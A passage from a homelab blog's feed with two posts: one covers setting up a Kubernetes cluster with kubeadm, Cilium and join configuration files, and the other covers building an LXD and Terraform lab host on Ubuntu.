</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubelet.config.k8s.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">KubeletConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cgroupDriver</span>: <span style="color:#e6db74">&#34;systemd&#34;</span>
</span></span></code></pre></div><p>For reference, you can see the defaults used without any flags or config files by
running <code>kubeadm config print init-defaults</code>.</p>
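<p>The same works for the join configuration discussed further down, so you can diff
your own files against the defaults:</p>
<pre tabindex="0"><code>kubeadm config print init-defaults
kubeadm config print join-defaults
</code></pre>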
<p>I&rsquo;m actually not diverging very much from the defaults here. As you can see with
the <code>if</code>s in the <code>kubeletExtraArgs</code>, I&rsquo;m using Ansible&rsquo;s templating engine
to assign roles to nodes via Kubernetes node labels.
Furthermore, I&rsquo;m disabling the <code>kube-proxy</code> initialization phase, because I will
be using Cilium as my Container Network Interface plugin, and it can already provide
the proxy functionality, which is mostly concerned with Kubernetes Service handling.
So I don&rsquo;t want kubeadm to install <code>kube-proxy</code> on the nodes.</p>
<p>For the cluster itself, I&rsquo;m also setting the service and pod CIDRs.</p>
<p><strong>Important note:</strong> I&rsquo;m using example values here, not my actual configs. If
you see any weird inconsistencies between IP addresses or DNS names, please yell
at me on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>. &#x1f609;</p>
<p>The <code>allocate-node-cidrs</code> option for the controllerManager is recommended by
Cilium.</p>
<p>Last but not least, the Kubernetes docs recommend to set the cgroupDriver
explicitly, which I do in the <code>KubeletConfiguration</code>.</p>
<p>After this file has been defined, we can run the command to init the cluster on
the first control plane node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm init --upload-certs --config /etc/kubernetes/kube-init-config.yaml
</span></span></code></pre></div><p>Noteworthy here is the <code>--upload-certs</code> flag. Without it, the certificates
generated during cluster initialization will not be stored inside the cluster. As a
consequence, they can&rsquo;t be reused when joining additional control plane nodes, and you
would have to run another command later to generate and upload a fresh set. Note that the
uploaded certs are only kept for a limited time (two hours by default), so if you plan to
add more control plane nodes only after that point, you can skip the flag for now and
upload the certs again later.</p>
<p>After this first node has been initialized, the next step is to copy the admin
kubeconfig to your workstation for use with <code>kubectl</code>. You can find it under
<code>/etc/kubernetes/admin.conf</code>.
To use this file, copy it to <code>~/.kube/config</code>.
Now you should be able to run your first command against your newly inaugurated
Kubernetes cluster, e.g. <code>kubectl get all -n kube-system</code>.</p>
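<p>A minimal sketch of that, with <code>controller1</code> as a placeholder for the first
control plane node:</p>
<pre tabindex="0"><code>mkdir -p ~/.kube
scp root@controller1:/etc/kubernetes/admin.conf ~/.kube/config
chmod 600 ~/.kube/config
kubectl get all -n kube-system
</code></pre>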
<p><strong>Security note:</strong> This file contains the private key which gives you full
access to the new Kubernetes cluster. Secure it appropriately. I will probably
do another post once I&rsquo;ve figured out what to do with it.</p>
<p>You will see a number of pods, mostly the Kubernetes control plane elements,
namely <code>etcd</code>, <code>kube-apiserver</code>, <code>kube-controller-manager</code> and <code>kube-scheduler</code>.
In addition, there should be a <code>kube-vip</code> instance. If the <code>kubectl get</code> command
fails, first check whether <code>kube-vip</code> starts up correctly.
The kubectl config file we copied from the initial cluster node to the
workstation contains the address entered under the <code>controlPlaneEndpoint</code> in
the kubeadm init config above. In my setup, that&rsquo;s a DNS entry which points to
the virtual IP managed by kube-vip.</p>
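<p>A couple of quick checks that can help narrow down where the problem sits, using
the example values from above (adapt the IP and DNS name to your environment):</p>
<pre tabindex="0"><code># Does the virtual IP answer at all?
ping -c 3 10.12.0.100
# Does the DNS name resolve to the virtual IP?
dig +short api.k8s.example.com
# Does the API server answer behind it? /version is usually readable without authentication.
curl -k https://api.k8s.example.com:6443/version
</code></pre>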
<p>You will also see that the <code>coredns</code> pods are currently still in the <code>Pending</code> state.
That&rsquo;s because CoreDNS, the default Kubernetes internal DNS server, only starts
up once a Container Network Interface plugin has been installed. In our case
that&rsquo;s Cilium.</p>
<h2 id="installing-cilium">Installing Cilium</h2>
<p>As I&rsquo;ve <a href="#preparing-the-machines">detailed the necessary preparations above</a>, the only thing left to
install Cilium is to run the install command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cilium install --set ipam.mode<span style="color:#f92672">=</span>cluster-pool --set ipam.operator.clusterPoolIPv4PodCIDRList<span style="color:#f92672">=</span>10.20.0.0/16 --set kubeProxyReplacement<span style="color:#f92672">=</span>true --version 1.14.1 --set encryption.enabled<span style="color:#f92672">=</span>true --set encryption.type<span style="color:#f92672">=</span>wireguard
</span></span></code></pre></div><p>This command should be run on your workstation. Cilium will automatically
use the kubectl config file in <code>~/.kube/config</code> to contact the cluster and
install itself.</p>
<p>The <code>clusterPoolIPv4PodCIDRList</code> is important here. Because while we already set
the Pod address CIDR in the kubeadm init config file above, Cilium does not seem
to have access to that and instead uses its internal default.
In addition, I&rsquo;m telling Cilium here that it should act as a replacement for
<code>kube-proxy</code>. Finally, I&rsquo;m enabling pod-to-pod encryption with WireGuard. This
way, I don&rsquo;t have to care about encrypting traffic between pods myself, e.g.
by configuring all my services to use TLS.</p>
<p>If the install command fails and the Cilium pods do not come up, check to make
sure that the preconditions I noted above are all fulfilled.
You should now see a single <code>cilium-operator</code> and a <code>cilium</code> pod in Running
state when you execute <code>kubectl get pods -n kube-system</code>. Furthermore, the
CoreDNS pod should now also be in the Running state.</p>
<p>You can check whether everything went alright by executing <code>cilium status</code> on
your workstation.</p>
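<p>For example, something along these lines should show the agent and operator as
healthy once the rollout is done; the <code>k8s-app=cilium</code> label is the one Cilium
puts on its agent pods:</p>
<pre tabindex="0"><code>cilium status --wait
kubectl -n kube-system get pods -l k8s-app=cilium
</code></pre>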
<h1 id="joining-remaining-nodes-to-the-cluster">Joining remaining nodes to the cluster</h1>
<p>For joining additional nodes, I went with a similar approach as for the cluster
init, using a <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-JoinConfiguration">join configuration file</a>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discovery</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrapToken</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">token</span>: <span style="color:#ae81ff">Token here</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">apiServerEndpoint</span>: <span style="color:#ae81ff">api.k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caCertHashes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;Cert Hash here&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;Cert key here&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span></code></pre></div><p>This file is a bit more unwieldy than the init config, because it also needs
to contain some secrets. This wouldn&rsquo;t be a problem if those secrets were
permanent; I could just store them in Vault. But they are pretty short-lived,
so storing them and templating them into the file during Ansible deployments
doesn&rsquo;t really work. So I just enter them into the file manually, without committing the
result to git.</p>
<p>When you run the <code>kubeadm init</code> command, the output will look something like
this, provided you supply the <code>--upload-certs</code> flag:</p>
<pre tabindex="0"><code>You can now join any number of control-plane node by running the following command on each as a root:
    kubeadm join 192.168.0.200:6443 --token 9vr73a.a8uxyaju799qwdjv --discovery-token-ca-cert-hash sha256:7c2e69131a36ae2a042a339b33381c6d0d43887e2de83720eff5359e26aec866 --control-plane --certificate-key f8902e114ef118304e561c3ecd4d0b543adc226b7a07f675f56564185ffe0c07
</code></pre><p>The important part you don&rsquo;t get without the <code>--upload-certs</code> flag is the
<code>--certificate-key</code>. This is required for new control plane nodes.
The values in this message fit into the <code>JoinConfiguration</code> as follows:</p>
<ul>
<li><strong>discovery.bootstrapToken.token:</strong> <code>--token</code> value</li>
<li><strong>discovery.bootstrapToken.caCertHashes:</strong> <code>--discovery-token-ca-cert-hash</code> value</li>
<li><strong>controlPlane.certificateKey:</strong> <code>--certificate-key</code> value</li>
</ul>
<p>A fully rendered version of the <code>JoinConfiguration</code> file above would look like
this, using the values from the <code>kubeadm init</code> example output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discovery</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrapToken</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">token</span>: <span style="color:#e6db74">&#34;9vr73a.a8uxyaju799qwdjv&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">apiServerEndpoint</span>: <span style="color:#ae81ff">192.168.0.200</span>:<span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caCertHashes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;sha256:7c2e69131a36ae2a042a339b33381c6d0d43887e2de83720eff5359e26aec866&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;f8902e114ef118304e561c3ecd4d0b543adc226b7a07f675f56564185ffe0c07&#34;</span>
</span></span></code></pre></div><p>If some time has passed since running the <code>kubeadm init</code> command, the bootstrap
token and the uploaded certs will have expired. You can recreate them by running the
following command on a control plane node which has already been initialized:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm init phase upload-certs --upload-certs
</span></span></code></pre></div><p>The output created will be similar to this:</p>
<pre tabindex="0"><code>[upload-certs] Storing the certificates in Secret &#34;kubeadm-certs&#34; in the &#34;kube-system&#34; Namespace
[upload-certs] Using certificate key:
supersecretcertkey
</code></pre><p>The last line is the new value for <code>certificateKey</code>. The next step is generating
a fresh bootstrap token, as that is invalidated after 24 hours:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubeadm token create --certificate-key supersecretcertkey --print-join-command
</span></span></code></pre></div><p>This will create a fresh join command you can use to join additional control
plane nodes to the cluster, or whose values you can enter into your <code>JoinConfiguration</code> file.</p>
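<p>With the values filled in, the actual join on the new node is then a single command.
The file name is my own choice here, analogous to the init config; kubeadm only cares
about the <code>--config</code> flag:</p>
<pre tabindex="0"><code>kubeadm join --config /etc/kubernetes/kube-join-config.yaml
</code></pre>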
<p>Finally, additional worker nodes can be joined in a similar manner. Simply remove
the following lines from the <code>JoinConfiguration</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">controlPlane</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">certificateKey</span>: <span style="color:#e6db74">&#34;Cert key here&#34;</span>
</span></span></code></pre></div><h1 id="deleting-a-cluster">Deleting a cluster</h1>
<p>As I had to kill the cluster multiple times but did not want to completely
reinstall the nodes every time, I also researched how to remove a cluster.
The steps are as follows:</p>
<ul>
<li>First remove the CNI plugin, with <code>cilium uninstall</code> in my case</li>
<li>Starting with the worker nodes, execute the following commands on each node:
<ol>
<li><code>kubeadm reset</code></li>
<li><code>rm -fr /etc/cni</code></li>
<li>Reboot the machine (this is for undoing the networking changes of the CNI plugin)</li>
</ol>
</li>
</ul>
<p>It is important to note the order here, always start with the worker nodes before
removing the control plane nodes.</p>
<h1 id="final-thoughts">Final thoughts</h1>
<p>First of all: Yay, Kubernetes Cluster! &#x1f973;</p>
<p>This was a pretty vexing process. The research phase, before I set up a cluster
for the first time, was considerably longer than for my current Nomad/Consul/Vault
cluster. And I feel that&rsquo;s mostly due to the differences in the documentation.
HashiCorp&rsquo;s docs, especially their tutorials, are top notch for all three tools.</p>
<p>Sure, if you follow the instructions in the docs for Kubernetes and Cilium, you
will relatively reliably end up with a working cluster. But it just feels like
there are a lot more moving parts. And some decisions you need to make up front,
like choosing a CNI plugin and a container engine.</p>
<p>Don&rsquo;t misunderstand me,
having that choice is great. As I mentioned above, I&rsquo;m a fan of apps that don&rsquo;t
have opinions on everything, so I can make choices for myself.
But in HashiCorp&rsquo;s Nomad, I can also do that. I even have greater choice, because
I can decide per workload which container engine I want to use, and which
networking plugin I want to use.</p>
<p>On the bright side, at least for now I have not seen anything I would consider
a show stopper for my migration to Kubernetes. As this article was a bit longer
in the making, I&rsquo;ve just finished setting up Traefik as my ingress a couple of days
ago, and I&rsquo;m now working on setting up a Rook Ceph cluster. Let&rsquo;s see how this
continues. &#x1f642;</p>
<p>Last but not least, a comment mostly to myself: Write setup articles closer to
when the actual setup happens. I&rsquo;m writing a lot of this over a month after I
issued the (currently &#x1f607;) final <code>kubeadm init</code>. I&rsquo;d made some notes on
important things, but I had not thought of copying the outputs of the
<code>kubeadm init</code> or <code>kubeadm join</code> commands to show what they&rsquo;re supposed to look
like. I also did not think of making a couple of notes on the initial output of
some <code>kubectl get</code> commands during the setup phase to show what to expect,
which I think would have been nice.</p>
<p>The next article in the series will be about day 1 operations, writing about how
I plan to handle Kubernetes manifests for actual workloads in my setup.</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Putting the &#39;lab&#39; back in &#39;Homelab&#39;</title>
      <link>https://blog.mei-home.net/posts/kubernetes-lab-setup/</link>
      <pubDate>Sun, 27 Aug 2023 16:50:42 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-lab-setup/</guid>
      <description>How I set up my lab environment for my Kubernetes experiment</description>
      <content:encoded><![CDATA[<p>So, as I mentioned in my <a href="https://blog.mei-home.net/posts/hashipocalypse/">last article</a>,
I want to give Kubernetes another try after HashiCorp&rsquo;s recent license change.</p>
<p>This also gives me a chance to put the <em>lab</em> back in Home<em>lab</em>, as it has mostly
been a Home<em>prod</em> environment - not much experimentation going on there, just
slow, intentional incremental changes here and there. But my Homeprod env is not
really suited for housing a Kubernetes cluster. It mostly consists of Raspberry
Pis. Don&rsquo;t get me wrong, it is serving me well - but running two parallel clusters
with two different orchestrators on the same HW is probably not a good idea. &#x1f609;</p>
<p>So I decided to dig out my old Homeserver from the days when my Homelab was only
a single machine. It is an x86 machine with an Intel i7 10th gen CPU, two 500 GB
SSDs and 64 GB of RAM, and it has been gathering dust in storage since I decommissioned
it sometime in the spring of this year. It still had all the innards from when I
decommissioned it, and after a quick once-over to make sure I hadn&rsquo;t unplugged
any important cables, I was able to boot it right up.</p>
<p>The first thing to go was the old Arch Linux install, as it&rsquo;s wholly unsuitable
for what I needed to be doing.
Instead, the machine got an Ubuntu install. Which was the first hurdle. Not the
actual install, but rather the setup of the damn stick for it. Because I didn&rsquo;t
want to connect a monitor and keyboard, I wanted to do a headless install.</p>
<p>And the Ubuntu installer even sets up an SSH server. But the password to log in
is randomized and - you guessed it - only shown on-screen after bootup.
Which I find an interesting decision. Of course, that&rsquo;s done for security
reasons - having default installer passwords is frowned upon these days.</p>
<p>Next, I thought I could just unpack the ISO, set a password for the <code>installer</code>
user and repackage it. I even found a couple of guides to do so, but I was not
able to properly repackage the changed ISO to be bootable. So I finally gave up
and just connected a monitor and keyboard.</p>
<h2 id="baremetal-host-setup">Baremetal host setup</h2>
<p>For the actual cluster machines, I went with LXD, for the simple reason that I
used it before I moved to a fleet of baremetal Raspberry Pis and had good
experience with it.</p>
<p>For storage, a local 70 GB partition serves as the root disk. The remaining roughly
400 GB of that SSD became an LVM volume group to serve as an LXD storage pool:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create LXD storage volume group</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">storage</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">community.general.lvg</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">vg</span>: <span style="color:#ae81ff">vg-lxd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">pvs</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/dev/sdb3</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span></code></pre></div><p>One more important change needed for the VM host is the creation of a bridge
interface so that the VMs can communicate with the host and with my wider network.
A Linux bridge interface is rather similar to a software network switch.
I set it up with Ubuntu&rsquo;s netplan. One very important point: You need to
disable DHCP on your main interface if it is part of the bridge, and instead
enable DHCP for the bridge interface. If you do it the other way around, with DHCP
left enabled on the physical interface, that interface sends out DHCP DISCOVER
requests but never acts on the DHCP OFFER sent back by your
networking infrastructure. It says so, plain and clear, in the <a href="https://netplan.readthedocs.io/en/stable/examples/#how-to-configure-network-bridges">netplan docs</a>
(why exactly does a Google search for &ldquo;netplan bridge&rdquo; not contain the netplan
docs on the very first page?!). So guess who had to pick the server up from its
corner and connect a monitor and keyboard again because he thought he was smarter
than the docs? &#x1f612;</p>
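<p>For illustration, here is a minimal netplan sketch of that setup. <code>enp5s0</code> is
a placeholder for the host&rsquo;s physical interface, and the file name is arbitrary:</p>
<pre tabindex="0"><code># /etc/netplan/01-bridge.yaml
network:
  version: 2
  ethernets:
    enp5s0:
      dhcp4: false
  bridges:
    br0:
      interfaces: [enp5s0]
      dhcp4: true
</code></pre>
<p>After a <code>netplan apply</code>, the bridge holds the DHCP lease and the physical
interface just forwards traffic.</p>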
<h2 id="the-vm-os">The VM OS</h2>
<p>All of the setup finally done, the next decision was on which OS to use for the
VMs. At first, I was a bit fascinated with <a href="https://www.talos.dev/">Talos Linux</a>,
which bills itself as a Linux for Kubernetes. It follows the new &ldquo;immutable distro&rdquo;
paradigm, and I had not yet dipped my toes into that particular topic - so time
to make this a double experiment? Alas, no. It looks like
Talos isn&rsquo;t just a distro which is &ldquo;good for Kubernetes&rdquo;, but also believes it
knows better than I do. Namely, it disables SSH access. Completely. You don&rsquo;t
really need shell access, you know? In fact, it&rsquo;s bad for you.</p>
<p>Let&rsquo;s clean up one myth right away: This is certainly not for security reasons,
because they still have an API with which you can supposedly do everything. So
we have replaced a decades-old project, OpenSSH, which has had audits up the wazoo,
with a hip new API. Yeah. Sure. I definitely trust your API way more than OpenSSH&hellip;</p>
<p>Another argument I heard, and found more believable than security, is saving Ops
teams from themselves, by removing the temptation of SSH&rsquo;ing into a machine
to fix a problem instead of going through the GitOps process, including code
reviews and everything. That one I buy a lot more readily.
Although I will say: I&rsquo;ve been working in ops for a while now, and I have been
very happy to have access to the actual machines for debugging purposes. Because
sometimes, you just need to attach strace to random processes.</p>
<p>Apart from that particular piece of opinionated design, it also has an admittedly
bigger problem when it comes to my goal of experimenting with Kubernetes: It
provides its own ability to set up a Kubernetes cluster, and automates a bit
too much, at least for my initial, experimental cluster. So I&rsquo;ve put it off for
now, and might set up another experiment once I&rsquo;ve become a bit more familiar
with Kubernetes.</p>
<p>On the positive side, it has support for Raspberry Pis, so at least that&rsquo;s
not a blocker.</p>
<p>I ended up going with what I already knew: Ubuntu, which I also run on all the
other machines in my Homelab.</p>
<h2 id="lxd-setup">LXD setup</h2>
<p>To set up the VMs, I decided to go with Terraform, because it allows me to store
the setup in config files, instead of having a playbook with a series of LXD
commands. I am using the <a href="https://registry.terraform.io/providers/terraform-lxd/lxd/latest">terraform-lxd provider</a>.</p>
<p>To initialize the provider, I first had to introduce it to my Terraform main
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#a6e22e">terraform</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">required_providers</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">lxd</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;terraform-lxd/lxd&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">version</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;~&gt; 1.10.1&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">data</span> <span style="color:#e6db74">&#34;vault_generic_secret&#34;</span> <span style="color:#e6db74">&#34;lxd-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secret/lxd-pw&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;lxd&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">generate_client_certificates</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">accept_remote_certificate</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">lxd_remote</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">scheme</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">address</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-fqdn-here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">default</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">password</span> <span style="color:#f92672">=</span> data.<span style="color:#a6e22e">vault_generic_secret</span>.<span style="color:#a6e22e">lxd</span><span style="color:#f92672">-</span><span style="color:#a6e22e">pw</span>[<span style="color:#e6db74">&#34;pw&#34;</span>]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>To get at the password, I&rsquo;m using my Vault instance again, where I pushed the
secret with <code>vault kv put secret/lxd-pw pw=-</code>. This is a bit of an anti-pattern,
as it ends up storing the password in the Terraform state. But I&rsquo;ve come to
accept that this sometimes happens, and my state is pretty well secured. Still, keep
this in mind when following along: your Terraform state should be kept secure!</p>
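<p>For reference, getting the password into Vault and checking what Terraform will
read back boils down to two standard Vault CLI commands (the path and key name are
just the ones used above; the <code>-</code> makes the CLI read the value from stdin):</p>
<pre tabindex="0"><code># push the LXD trust password, reading the value from stdin
vault kv put secret/lxd-pw pw=-

# read it back to double-check what the Terraform data source will see
vault kv get -field=pw secret/lxd-pw
</code></pre>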
<p>The next step is configuring the LVM-based LXD storage pool I mentioned above. This
is also done in Terraform:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_storage_pool&#34;</span> <span style="color:#e6db74">&#34;lvm-pool&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lvm-pool&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">driver</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lvm&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vg-lxd&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;lvm.thinpool_name&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;LXDThinPool&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;lvm.vg_name&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vg-lxd&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Next come a couple of profiles: one for my controller nodes, with 4 CPUs and 4 GB of
RAM, somewhat similar to the Raspberry Pi 4 4 GB boards which will ultimately run my
control plane; another one for my Ceph nodes with a bit more RAM; a base profile
for networking, which adds a NIC based on the bridge interface created previously;
and finally a profile for VMs with a local root disk from the LVM pool.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-base&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;base&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot.autostart&#34;</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.vendor-data&#34;</span> <span style="color:#f92672">=</span> file(<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">path</span>.module<span style="color:#e6db74">}</span><span style="color:#e6db74">/lxd/vendor-data.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;network&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nic&#34;</span>
